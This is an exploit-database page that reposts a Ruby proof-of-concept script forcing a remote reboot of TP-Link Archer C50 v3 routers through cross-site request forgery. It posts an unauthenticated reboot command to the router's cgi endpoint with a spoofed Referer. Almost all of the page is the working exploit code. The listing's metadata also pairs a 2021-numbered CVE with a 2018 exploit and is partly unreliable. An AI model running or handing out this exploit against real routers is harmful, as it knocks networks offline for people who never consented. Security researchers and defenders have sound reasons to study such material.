TP-Link C50 Wireless Router 3 Remote Reboot Cross Site Request Forgery

CVE	Category	Price	Severity
CVE-2021-40940	CWE-352	$500	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2018-08-10

CPE
cpe:cpe:/h:tp-link:c50_router

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080076

Below is a copy:

TP-Link C50 Wireless Router 3 Remote Reboot Cross Site Request Forgery

# Exploit Title: TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)
# Date: 2018-08-09
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Hardware Version: Archer C50 v3 00000001
# Firmware Link: https://www.tp-link.com/download/Archer-C50_V3.html#Firmware
# Firmware Version: <= Build 171227
 
 
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
url = "http://192.168.0.1:80/"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
require('mechanize')
agent = Mechanize.new()
 
def reboot(agent, url, path, query)
begin
    response = agent.post(url+path, query, {
        "User-Agent" => "",
        "Accept" => "*/*",
        "Referer" => "http://192.168.0.1/mainFrame.htm",
        "Content-Type" => "text/plain",
        "Connection" => "keep-alive",
        "Cookie" => ""
    })
rescue Exception => e
    begin
        puts(e.inspect())
        puts(e.page().body())
    rescue
    end
    puts("")
else
    puts(path)
    puts(response.body())
    puts("")
end
end
 
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
reboot(agent, url, "cgi?7", "[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n")
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum